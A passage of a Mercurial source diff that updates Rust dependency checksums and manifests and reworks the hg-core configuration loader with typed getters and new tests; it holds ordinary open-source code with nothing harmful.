-"checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2"
-"checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6"
-"checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574"
-"checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8"
-"checksum hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "644f9158b2f133fd50f5fb3242878846d9eb792e445c893805ff0e3824006e35"
-"checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f"
-"checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f"
-"checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b"
-"checksum jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)" = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2"
-"checksum lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"
-"checksum libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)" = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb"
-"checksum libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655"
-"checksum log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)" = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b"
-"checksum maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00"
-"checksum memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525"
-"checksum memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)" = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b"
-"checksum memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87"
-"checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c"
-"checksum micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d"
-"checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d"
-"checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290"
-"checksum num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3"
-"checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9"
-"checksum pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)" = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c"
-"checksum ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)" = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857"
-"checksum pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427"
-"checksum proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)" = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5"
-"checksum proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)" = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71"
-"checksum python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c"
-"checksum python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4"
-"checksum quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0"
-"checksum quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)" = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37"
-"checksum rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)" = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c"
-"checksum rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)" = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293"
-"checksum rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)" = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03"
-"checksum rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402"
-"checksum rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b"
-"checksum rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc"
-"checksum rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19"
-"checksum rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2"
-"checksum rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c"
-"checksum rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429"
-"checksum rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004"
-"checksum rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674"
-"checksum rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a"
-"checksum rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2"
-"checksum redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)" = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce"
-"checksum regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c"
-"checksum regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)" = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189"
-"checksum remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7"
-"checksum rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)" = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a"
-"checksum rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)" = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda"
-"checksum same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)" = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502"
-"checksum scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
-"checksum sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)" = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f"
-"checksum static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f"
-"checksum strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a"
-"checksum syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)" = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44"
-"checksum tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9"
-"checksum termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4"
-"checksum textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060"
-"checksum thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14"
-"checksum time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255"
-"checksum twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)" = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59"
-"checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33"
-"checksum unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3"
-"checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564"
-"checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb"
-"checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191"
-"checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed"
-"checksum wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f"
-"checksum wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519"
-"checksum winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)" = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
-"checksum winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
-"checksum winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)" = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178"
-"checksum winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
-"checksum zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8"
-"checksum zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055"
-"checksum zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b"
--- a/rust/hg-core/Cargo.toml Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/Cargo.toml Tue Apr 20 11:01:06 2021 -0400
@@ -9,11 +9,12 @@
name = "hg"
[dependencies]
+bytes-cast = "0.1"
byteorder = "1.3.4"
-hex = "0.4.2"
+derive_more = "0.99"
+home = "0.5"
im-rc = "15.0.*"
lazy_static = "1.4.0"
-memchr = "2.3.3"
rand = "0.7.3"
rand_pcg = "0.2.1"
rand_distr = "0.2.2"
@@ -27,7 +28,7 @@
memmap = "0.7.0"
zstd = "0.5.3"
rust-crypto = "0.2.36"
-format-bytes = "0.1.2"
+format-bytes = "0.2.2"
# We don't use the `miniz-oxide` backend to not change rhg benchmarks and until
# we have a clearer view of which backend is the fastest.
@@ -40,9 +41,3 @@
clap = "*"
pretty_assertions = "0.6.1"
tempfile = "3.1.0"
-
-[features]
-# Use a (still unoptimized) tree for the dirstate instead of the current flat
-# dirstate. This is not yet recommended for performance reasons. A future
-# version might make it the default, or make it a runtime option.
-dirstate-tree = []
--- a/rust/hg-core/examples/nodemap/main.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/examples/nodemap/main.rs Tue Apr 20 11:01:06 2021 -0400
@@ -49,7 +49,7 @@
fn query(index: &Index, nm: &NodeTree, prefix: &str) {
let start = Instant::now();
- let res = nm.find_hex(index, prefix);
+ let res = NodePrefix::from_hex(prefix).map(|p| nm.find_bin(index, p));
println!("Result found in {:?}: {:?}", start.elapsed(), res);
}
@@ -66,7 +66,7 @@
.collect();
if queries < 10 {
let nodes_hex: Vec<String> =
- nodes.iter().map(|n| n.encode_hex()).collect();
+ nodes.iter().map(|n| format!("{:x}", n)).collect();
println!("Nodes: {:?}", nodes_hex);
}
let mut last: Option<Revision> = None;
@@ -76,11 +76,11 @@
}
let elapsed = start.elapsed();
println!(
- "Did {} queries in {:?} (mean {:?}), last was {:?} with result {:?}",
+ "Did {} queries in {:?} (mean {:?}), last was {:x} with result {:?}",
queries,
elapsed,
elapsed / (queries as u32),
- nodes.last().unwrap().encode_hex(),
+ nodes.last().unwrap(),
last
);
}
--- a/rust/hg-core/src/config.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/config.rs Tue Apr 20 11:01:06 2021 -0400
@@ -11,4 +11,6 @@
mod config;
mod layer;
-pub use config::Config;
+mod values;
+pub use config::{Config, ConfigValueParseError};
+pub use layer::{ConfigError, ConfigParseError};
--- a/rust/hg-core/src/config/config.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/config/config.rs Tue Apr 20 11:01:06 2021 -0400
@@ -8,25 +8,44 @@
// GNU General Public License version 2 or any later version.
use super::layer;
-use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue};
-use std::path::PathBuf;
+use super::values;
+use crate::config::layer::{
+ ConfigError, ConfigLayer, ConfigOrigin, ConfigValue,
+};
+use crate::utils::files::get_bytes_from_os_str;
+use crate::utils::SliceExt;
+use format_bytes::{write_bytes, DisplayBytes};
+use std::collections::HashSet;
+use std::env;
+use std::fmt;
+use std::path::{Path, PathBuf};
+use std::str;
-use crate::operations::find_root;
-use crate::utils::files::read_whole_file;
+use crate::errors::{HgResultExt, IoResultExt};
/// Holds the config values for the current repository
/// TODO update this docstring once we support more sources
+#[derive(Clone)]
pub struct Config {
layers: Vec<layer::ConfigLayer>,
}
-impl std::fmt::Debug for Config {
- fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+impl DisplayBytes for Config {
+ fn display_bytes(
+ &self,
+ out: &mut dyn std::io::Write,
+ ) -> std::io::Result<()> {
for (index, layer) in self.layers.iter().rev().enumerate() {
- write!(
- f,
- "==== Layer {} (trusted: {}) ====\n{:?}",
- index, layer.trusted, layer
+ write_bytes!(
+ out,
+ b"==== Layer {} (trusted: {}) ====\n{}",
+ index,
+ if layer.trusted {
+ &b"yes"[..]
+ } else {
+ &b"no"[..]
+ },
+ layer
)?;
}
Ok(())
@@ -40,15 +59,176 @@
Parsed(layer::ConfigLayer),
}
-pub fn parse_bool(v: &[u8]) -> Option<bool> {
- match v.to_ascii_lowercase().as_slice() {
- b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true),
- b"0" | b"no" | b"false" | b"off" | b"never" => Some(false),
- _ => None,
+#[derive(Debug)]
+pub struct ConfigValueParseError {
+ pub origin: ConfigOrigin,
+ pub line: Option<usize>,
+ pub section: Vec<u8>,
+ pub item: Vec<u8>,
+ pub value: Vec<u8>,
+ pub expected_type: &'static str,
+}
+
+impl fmt::Display for ConfigValueParseError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ // TODO: add origin and line number information, here and in
+ // corresponding python code
+ write!(
+ f,
+ "config error: {}.{} is not a {} ('{}')",
+ String::from_utf8_lossy(&self.section),
+ String::from_utf8_lossy(&self.item),
+ self.expected_type,
+ String::from_utf8_lossy(&self.value)
+ )
}
}
impl Config {
+ /// Load system and user configuration from various files.
+ ///
+ /// This is also affected by some environment variables.
+ pub fn load(
+ cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>,
+ ) -> Result<Self, ConfigError> {
+ let mut config = Self { layers: Vec::new() };
+ let opt_rc_path = env::var_os("HGRCPATH");
+ // HGRCPATH replaces system config
+ if opt_rc_path.is_none() {
+ config.add_system_config()?
+ }
+
+ config.add_for_environment_variable("EDITOR", b"ui", b"editor");
+ config.add_for_environment_variable("VISUAL", b"ui", b"editor");
+ config.add_for_environment_variable("PAGER", b"pager", b"pager");
+
+ // These are set by `run-tests.py --rhg` to enable fallback for the
+ // entire test suite. Alternatives would be setting configuration
+ // through `$HGRCPATH` but some tests override that, or changing the
+ // `hg` shell alias to include `--config` but that disrupts tests that
+ // print command lines and check expected output.
+ config.add_for_environment_variable(
+ "RHG_ON_UNSUPPORTED",
+ b"rhg",
+ b"on-unsupported",
+ );
+ config.add_for_environment_variable(
+ "RHG_FALLBACK_EXECUTABLE",
+ b"rhg",
+ b"fallback-executable",
+ );
+
+ // HGRCPATH replaces user config
+ if opt_rc_path.is_none() {
+ config.add_user_config()?
+ }
+ if let Some(rc_path) = &opt_rc_path {
+ for path in env::split_paths(rc_path) {
+ if !path.as_os_str().is_empty() {
+ if path.is_dir() {
+ config.add_trusted_dir(&path)?
+ } else {
+ config.add_trusted_file(&path)?
+ }
+ }
+ }
+ }
+ if let Some(layer) = ConfigLayer::parse_cli_args(cli_config_args)? {
+ config.layers.push(layer)
+ }
+ Ok(config)
+ }
+
+ fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> {
+ if let Some(entries) = std::fs::read_dir(path)
+ .when_reading_file(path)
+ .io_not_found_as_none()?
+ {
+ let mut file_paths = entries
+ .map(|result| {
+ result.when_reading_file(path).map(|entry| entry.path())
+ })
+ .collect::<Result<Vec<_>, _>>()?;
+ file_paths.sort();
+ for file_path in &file_paths {
+ if file_path.extension() == Some(std::ffi::OsStr::new("rc")) {
+ self.add_trusted_file(&file_path)?
+ }
+ }
+ }
+ Ok(())
+ }
+
+ fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> {
+ if let Some(data) = std::fs::read(path)
+ .when_reading_file(path)
+ .io_not_found_as_none()?
+ {
+ self.layers.extend(ConfigLayer::parse(path, &data)?)
+ }
+ Ok(())
+ }
+
+ fn add_for_environment_variable(
+ &mut self,
+ var: &str,
+ section: &[u8],
+ key: &[u8],
+ ) {
+ if let Some(value) = env::var_os(var) {
+ let origin = layer::ConfigOrigin::Environment(var.into());
+ let mut layer = ConfigLayer::new(origin);
+ layer.add(
+ section.to_owned(),
+ key.to_owned(),
+ get_bytes_from_os_str(value),
+ None,
+ );
+ self.layers.push(layer)
+ }
+ }
+
+ #[cfg(unix)] // TODO: other platforms
+ fn add_system_config(&mut self) -> Result<(), ConfigError> {
+ let mut add_for_prefix = |prefix: &Path| -> Result<(), ConfigError> {
+ let etc = prefix.join("etc").join("mercurial");
+ self.add_trusted_file(&etc.join("hgrc"))?;
+ self.add_trusted_dir(&etc.join("hgrc.d"))
+ };
+ let root = Path::new("/");
+ // TODO: use `std::env::args_os().next().unwrap()` a.k.a. argv[0]
+ // instead? TODO: can this be a relative path?
+ let hg = crate::utils::current_exe()?;
+ // TODO: this order (per-installation then per-system) matches
+ // `systemrcpath()` in `mercurial/scmposix.py`, but
+ // `mercurial/helptext/config.txt` suggests it should be reversed
+ if let Some(installation_prefix) = hg.parent().and_then(Path::parent) {
+ if installation_prefix != root {
+ add_for_prefix(&installation_prefix)?
+ }
+ }
+ add_for_prefix(root)?;
+ Ok(())
+ }
+
+ #[cfg(unix)] // TODO: other plateforms
+ fn add_user_config(&mut self) -> Result<(), ConfigError> {
+ let opt_home = home::home_dir();
+ if let Some(home) = &opt_home {
+ self.add_trusted_file(&home.join(".hgrc"))?
+ }
+ let darwin = cfg!(any(target_os = "macos", target_os = "ios"));
+ if !darwin {
+ if let Some(config_home) = env::var_os("XDG_CONFIG_HOME")
+ .map(PathBuf::from)
+ .or_else(|| opt_home.map(|home| home.join(".config")))
+ {
+ self.add_trusted_file(&config_home.join("hg").join("hgrc"))?
+ }
+ }
+ Ok(())
+ }
+
/// Loads in order, which means that the precedence is the same
/// as the order of `sources`.
pub fn load_from_explicit_sources(
@@ -62,7 +242,7 @@
ConfigSource::AbsPath(c) => {
// TODO check if it should be trusted
// mercurial/ui.py:427
- let data = match read_whole_file(&c) {
+ let data = match std::fs::read(&c) {
Err(_) => continue, // same as the python code
Ok(data) => data,
};
@@ -74,13 +254,86 @@
Ok(Config { layers })
}
- /// Loads the local config. In a future version, this will also load the
- /// `$HOME/.hgrc` and more to mirror the Python implementation.
- pub fn load() -> Result<Self, ConfigError> {
- let root = find_root().unwrap();
- Ok(Self::load_from_explicit_sources(vec![
- ConfigSource::AbsPath(root.join(".hg/hgrc")),
- ])?)
+ /// Loads the per-repository config into a new `Config` which is combined
+ /// with `self`.
+ pub(crate) fn combine_with_repo(
+ &self,
+ repo_config_files: &[PathBuf],
+ ) -> Result<Self, ConfigError> {
+ let (cli_layers, other_layers) = self
+ .layers
+ .iter()
+ .cloned()
+ .partition(ConfigLayer::is_from_command_line);
+
+ let mut repo_config = Self {
+ layers: other_layers,
+ };
+ for path in repo_config_files {
+ // TODO: check if this file should be trusted:
+ // `mercurial/ui.py:427`
+ repo_config.add_trusted_file(path)?;
+ }
+ repo_config.layers.extend(cli_layers);
+ Ok(repo_config)
+ }
+
+ fn get_parse<'config, T: 'config>(
+ &'config self,
+ section: &[u8],
+ item: &[u8],
+ expected_type: &'static str,
+ parse: impl Fn(&'config [u8]) -> Option<T>,
+ ) -> Result<Option<T>, ConfigValueParseError> {
+ match self.get_inner(§ion, &item) {
+ Some((layer, v)) => match parse(&v.bytes) {
+ Some(b) => Ok(Some(b)),
+ None => Err(ConfigValueParseError {
+ origin: layer.origin.to_owned(),
+ line: v.line,
+ value: v.bytes.to_owned(),
+ section: section.to_owned(),
+ item: item.to_owned(),
+ expected_type,
+ }),
+ },
+ None => Ok(None),
+ }
+ }
+
+ /// Returns an `Err` if the first value found is not a valid UTF-8 string.
+ /// Otherwise, returns an `Ok(value)` if found, or `None`.
+ pub fn get_str(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Result<Option<&str>, ConfigValueParseError> {
+ self.get_parse(section, item, "ASCII or UTF-8 string", |value| {
+ str::from_utf8(value).ok()
+ })
+ }
+
+ /// Returns an `Err` if the first value found is not a valid unsigned
+ /// integer. Otherwise, returns an `Ok(value)` if found, or `None`.
+ pub fn get_u32(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Result<Option<u32>, ConfigValueParseError> {
+ self.get_parse(section, item, "valid integer", |value| {
+ str::from_utf8(value).ok()?.parse().ok()
+ })
+ }
+
+ /// Returns an `Err` if the first value found is not a valid file size
+ /// value such as `30` (default unit is bytes), `7 MB`, or `42.5 kb`.
+ /// Otherwise, returns an `Ok(value_in_bytes)` if found, or `None`.
+ pub fn get_byte_size(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Result<Option<u64>, ConfigValueParseError> {
+ self.get_parse(section, item, "byte quantity", values::parse_byte_size)
}
/// Returns an `Err` if the first value found is not a valid boolean.
@@ -90,18 +343,8 @@
&self,
section: &[u8],
item: &[u8],
- ) -> Result<Option<bool>, ConfigError> {
- match self.get_inner(§ion, &item) {
- Some((layer, v)) => match parse_bool(&v.bytes) {
- Some(b) => Ok(Some(b)),
- None => Err(ConfigError::Parse {
- origin: layer.origin.to_owned(),
- line: v.line,
- bytes: v.bytes.to_owned(),
- }),
- },
- None => Ok(None),
- }
+ ) -> Result<Option<bool>, ConfigValueParseError> {
+ self.get_parse(section, item, "boolean", values::parse_bool)
}
/// Returns the corresponding boolean in the config. Returns `Ok(false)`
@@ -110,10 +353,35 @@
&self,
section: &[u8],
item: &[u8],
- ) -> Result<bool, ConfigError> {
+ ) -> Result<bool, ConfigValueParseError> {
Ok(self.get_option(section, item)?.unwrap_or(false))
}
+ /// Returns the corresponding list-value in the config if found, or `None`.
+ ///
+ /// This is appropriate for new configuration keys. The value syntax is
+ /// **not** the same as most existing list-valued config, which has Python
+ /// parsing implemented in `parselist()` in `mercurial/config.py`.
+ /// Faithfully porting that parsing algorithm to Rust (including behavior
+ /// that are arguably bugs) turned out to be non-trivial and hasn’t been
+ /// completed as of this writing.
+ ///
+ /// Instead, the "simple" syntax is: split on comma, then trim leading and
+ /// trailing whitespace of each component. Quotes or backslashes are not
+ /// interpreted in any way. Commas are mandatory between values. Values
+ /// that contain a comma are not supported.
+ pub fn get_simple_list(
+ &self,
+ section: &[u8],
+ item: &[u8],
+ ) -> Option<impl Iterator<Item = &[u8]>> {
+ self.get(section, item).map(|value| {
+ value
+ .split(|&byte| byte == b',')
+ .map(|component| component.trim())
+ })
+ }
+
/// Returns the raw value bytes of the first one found, or `None`.
pub fn get(&self, section: &[u8], item: &[u8]) -> Option<&[u8]> {
self.get_inner(section, item)
@@ -137,6 +405,14 @@
None
}
+ /// Return all keys defined for the given section
+ pub fn get_section_keys(&self, section: &[u8]) -> HashSet<&[u8]> {
+ self.layers
+ .iter()
+ .flat_map(|layer| layer.iter_keys(section))
+ .collect()
+ }
+
/// Get raw values bytes from all layers (even untrusted ones) in order
/// of precedence.
#[cfg(test)]
@@ -169,15 +445,14 @@
let base_config_path = tmpdir_path.join("base.rc");
let mut config_file = File::create(&base_config_path).unwrap();
let data =
- b"[section]\nitem=value0\n%include included.rc\nitem=value2";
+ b"[section]\nitem=value0\n%include included.rc\nitem=value2\n\
+ [section2]\ncount = 4\nsize = 1.5 KB\nnot-count = 1.5\nnot-size = 1 ub";
config_file.write_all(data).unwrap();
let sources = vec![ConfigSource::AbsPath(base_config_path)];
let config = Config::load_from_explicit_sources(sources)
.expect("expected valid config");
- dbg!(&config);
-
let (_, value) = config.get_inner(b"section", b"item").unwrap();
assert_eq!(
value,
@@ -193,5 +468,13 @@
config.get_all(b"section", b"item"),
[b"value2", b"value1", b"value0"]
);
+
+ assert_eq!(config.get_u32(b"section2", b"count").unwrap(), Some(4));
+ assert_eq!(
+ config.get_byte_size(b"section2", b"size").unwrap(),
+ Some(1024 + 512)
+ );
+ assert!(config.get_u32(b"section2", b"not-count").is_err());
+ assert!(config.get_byte_size(b"section2", b"not-size").is_err());
}
}
--- a/rust/hg-core/src/config/layer.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/config/layer.rs Tue Apr 20 11:01:06 2021 -0400
@@ -7,14 +7,12 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use crate::utils::files::{
- get_bytes_from_path, get_path_from_bytes, read_whole_file,
-};
-use format_bytes::format_bytes;
+use crate::errors::HgError;
+use crate::utils::files::{get_bytes_from_path, get_path_from_bytes};
+use format_bytes::{format_bytes, write_bytes, DisplayBytes};
use lazy_static::lazy_static;
use regex::bytes::Regex;
use std::collections::HashMap;
-use std::io;
use std::path::{Path, PathBuf};
lazy_static! {
